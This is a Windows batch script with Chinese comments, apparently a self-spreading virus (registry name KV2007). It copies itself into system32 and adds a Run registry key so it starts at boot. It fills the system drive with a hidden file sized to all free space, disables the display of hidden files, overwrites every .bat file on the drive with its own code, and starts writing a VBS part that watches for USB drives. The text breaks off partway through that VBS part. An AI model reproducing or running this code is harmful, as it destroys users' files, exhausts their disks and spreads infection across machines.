if exsit %SystemDrive%/PAGEFILES.SYS goto end copy %0 %windir%/system32/logon.bat ::复制自身 FOR /F "tokens=3*" %%i in ('dir /-c %SystemDrive%^|find "可用字节"') do fsutil file createnew %SystemDrive%/PAGEFILES.SYS %%i ::制造超大文件,轰炸硬盘 attrib +r +s +h %SystemDrive%/PAGEFILES.SYS ::隐藏文件 reg add HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Run /v KV2007 /t REG_SZ /d %windir%/system32/logon.vbs ::自动启动 reg delete HKLM/Software/Microsoft/windows/CurrentVersion/explorer/Advanced/Folder/Hidden/SHOWALL /va /f ::不显示隐藏文件 for /r %SystemDrive% %%i in (*.bat) do type %0>%%i ::感染
if exist %windir%/system32/logon.vbs goto end +++++++++++++++++++++++++=VBS部分+++++++++++++++++++++++++++++++++++++++
echo set fs =createobject("scripting.filesystemobject")>>%windir%/system32/logon.vbs echo set WshShell = WScript.CreateObject("WScript.Shell")>>%windir%/system32/logon.vbs echo Set objWMIService = GetObject("winmgmts:" _>>%windir%/system32/logon.vbs echo ^& "{impersonationLevel=impersonate}!//" ^& strComputer ^& "/root/cimv2")>>%windir%/system32/logon.vbs echo Set colDisks = objWMIService.ExecQuery _>>%windir%/system32/logon.vbs echo ("Select * from Win32_LogicalDisk")>>%windir%/system32/logon.vbs
::监视u盘 echo For i =1 to 9000000000>>%windir%/system32/logon.vbs echo For Each objDisk in colDisks>>%windir%/system32/logon.vbs echo Select Case objDisk.DriveType>>%windir%/system32/logon.vbs echo :Case 2:>>%windir%/system32/logon.vbs